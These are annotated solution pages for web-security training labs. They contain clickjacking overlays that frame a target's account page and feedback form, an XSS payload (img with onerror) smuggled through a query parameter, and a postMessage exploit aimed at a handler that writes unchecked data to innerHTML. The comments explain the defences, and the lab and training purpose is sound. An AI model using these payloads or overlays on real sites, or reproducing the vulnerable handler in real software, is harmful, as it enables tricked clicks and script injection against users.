Clickjacking
Lab: Basic clickjacking with CSRF token protection
<!--
  Proof-of-concept page for the lab named above. The target's /my-account page
  is loaded in a nearly transparent iframe stacked above a visible "Click me"
  decoy, so a click aimed at the decoy is delivered to the framed page.
  NOTE(review): the top/left offsets are presumably tuned so the decoy sits
  under a sensitive control on the framed page; the page itself does not say
  which control.
  Why the CSRF token does not help: the click happens inside the genuine page
  in the victim's own session, so the request carries a valid token.
  Defence on the target: refuse to be framed by other origins, via the
  X-Frame-Options response header (DENY or SAMEORIGIN) or a
  Content-Security-Policy frame-ancestors directive.
-->
<style>
/* The framed target: stacked on top (z-index 2) and almost invisible (opacity 0.1). */
iframe {
position:relative;
width:700px;
height: 500px;
opacity: 0.1;
z-index: 2;
}
/* The visible decoy: absolutely positioned underneath the frame (z-index 1). */
div {
position:absolute;
top:400px;
left:60px;
z-index: 1;
}
</style>
<div>Click me</div>
<iframe src="https://0a0700e40484434d81eb262a00f20067.web-security-academy.net/my-account"></iframe>
<!--
  Second proof-of-concept, same overlay layout with slightly different decoy
  offsets. Here the framed URL is the target's /feedback page with the form
  fields supplied as query parameters; the name parameter carries HTML markup
  (an img element with an onerror handler calling print()).
  NOTE(review): this presumably relies on the feedback page writing the
  submitted name back into the DOM without encoding once the form is
  submitted by the redirected click; the vulnerable code is not shown here.
  Defences on the target: encode or sanitise the name value before it is
  rendered, and refuse cross-origin framing (X-Frame-Options or a
  Content-Security-Policy frame-ancestors directive).
-->
<style>
/* The framed target: stacked on top (z-index 2) and almost invisible (opacity 0.1). */
iframe {
position:relative;
width:700px;
height: 500px;
opacity: 0.1;
z-index: 2;
}
/* The visible decoy: absolutely positioned underneath the frame (z-index 1). */
div {
position:absolute;
top:410px;
left:80px;
z-index: 1;
}
</style>
<div>Click me</div>
<iframe
src="https://0a7100ad033a81ce80eabd7200b10064.web-security-academy.net/feedback?name=<img src=1 onerror=print()>&email=hacker@attacker-website.com&subject=test&message=test#feedbackResult"></iframe>
<!-- victim script: excerpt of the vulnerable page under test, kept as written. NOTE(review): the message handler below accepts data from any sender. -->
<!-- Ads to be inserted here -->
<div id='ads'>
</div>
<script>
// Handles cross-document messages delivered to this window via postMessage.
window.addEventListener('message', function(e) {
// NOTE(review): e.origin is never checked and e.data is parsed as HTML, so any
// page able to message this window can inject markup here (innerHTML is a DOM XSS sink).
// Hardening: return early unless e.origin is on an allow-list of expected senders,
// and write the data with textContent (or sanitise it) instead of innerHTML.
document.getElementById('ads').innerHTML = e.data;
})
</script>
<!-- exploit server: page hosted by the tester for the lab. When the framed target finishes loading, the onload handler posts a string containing an img/onerror markup to it; the '*' targetOrigin places no restriction on the recipient. The print() call only shows that script ran in the target's origin. The defence sits in the receiving page: check e.origin and never pass message data to innerHTML. Framing restrictions (X-Frame-Options or CSP frame-ancestors) would block this particular iframe delivery but are not a substitute for the origin check. -->
<iframe src="https://0a4e00fd03dfaaf680db26b300e00060.web-security-academy.net/" onload="this.contentWindow.postMessage('<img src=1 onerror=print()>','*')">